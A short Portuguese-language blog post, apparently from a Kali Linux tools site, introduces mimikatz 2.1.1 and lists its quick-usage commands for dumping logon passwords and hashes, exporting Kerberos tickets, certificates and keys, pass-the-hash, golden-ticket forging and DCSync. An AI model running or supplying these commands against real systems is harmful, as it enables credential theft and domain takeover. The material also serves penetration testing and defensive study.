ANDROID

[ANDROID][bsummary]

FACEBOOK

[FACEBOOK][twocolumns]

NOTÍCIAS

[NOTÍCIAS][bleft]

KALI LINUX

[KALI LINUX][grids]

mimikatz 2.1.1 - Uma ferramenta pós-exploração para extrair senhas Plaintexts, Hash, código PIN da memória

mimikatz 2.1.1


Mimikatz é uma ferramenta de pós-exploração escrita por Benjamin Delpy (gentilkiwi). Após a fase de exploração inicial, os atacantes podem querer obter uma posição mais firme no computador / rede. Faz com tanta frequência um conjunto de ferramentas complementares. A Mimikatz é uma tentativa de agrupar algumas das tarefas mais úteis que os atacantes vão querer realizar.

Agora é bem conhecido extrair senhas de plaintexts, hash, código PIN e bilhetes da Kerberos a partir da memória. mimikatztambém pode executar pass-the-hash, pass-the-ticket ou construir bilhetes Golden .

Uso rápido
log
privilege::debug

sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

cripto
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local



0 comentários via Blogger
comentários via Facebook

Nenhum comentário :